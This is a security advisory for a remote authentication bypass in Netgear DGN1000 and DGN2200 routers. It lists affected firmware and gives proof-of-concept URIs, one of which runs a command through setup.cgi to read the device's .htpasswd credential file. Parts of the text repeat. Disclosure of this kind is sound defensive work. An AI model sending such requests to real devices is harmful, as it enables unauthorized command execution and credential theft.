Multiple Netgear DGN Devices Remote Authentication Bypass Vulnerability
BID:60281
Info
Multiple Netgear DGN Devices Remote Authentication Bypass Vulnerability
| Bugtraq ID: | 60281 |
| Class: | Access Validation Error |
| CVE: | |
| Remote: | Yes |
| Local: | No |
| Published: | May 31 2013 12:00AM |
| Updated: | May 31 2013 12:00AM |
| Credit: | Roberto Paleari |
| Vulnerable: |
NetGear DGN2200v1 0 NetGear DGN1000 Firmware 1.1.00.41 |
| Not Vulnerable: |
NetGear DGN1000 Firmware 1.1.00.48 |
Discussion
Multiple Netgear DGN Devices Remote Authentication Bypass Vulnerability
Netgear DGN1000 and DGN2200 devices are prone to a remote authentication-bypass vulnerability.
Remote attackers can exploit this issue to bypass the authentication mechanism and execute commands within the context of affected devices with elevated privileges.
The following versions are vulnerable:
NetGear DGN1000 running firmware prior to version 1.1.00.48
Netgear DGN2200 v1
Netgear DGN1000 and DGN2200 devices are prone to a remote authentication-bypass vulnerability.
Remote attackers can exploit this issue to bypass the authentication mechanism and execute commands within the context of affected devices with elevated privileges.
The following versions are vulnerable:
NetGear DGN1000 running firmware prior to version 1.1.00.48
Netgear DGN2200 v1
Exploit / POC
Multiple Netgear DGN Devices Remote Authentication Bypass Vulnerability
Attackers can use a browser to exploit this issue.
The following example URIs are available:
http://www.example.com/setup.cgi?currentsetting.htm=1
http://www.example.com/setup.cgi?next_file=netgear.cfg&todo=syscmd&cmd=cat+/www/.htpasswd&curpath=/&currentsetting.htm=1
Attackers can use a browser to exploit this issue.
The following example URIs are available:
http://www.example.com/setup.cgi?currentsetting.htm=1
http://www.example.com/setup.cgi?next_file=netgear.cfg&todo=syscmd&cmd=cat+/www/.htpasswd&curpath=/&currentsetting.htm=1
References
Multiple Netgear DGN Devices Remote Authentication Bypass Vulnerability
References:
References:
- NETGEAR DGN1000 Homepage (NetGear)
- NETGEAR DGN2200 Homepage (NetGear)
- Unauthenticated command execution on Netgear DGN devices (roberto)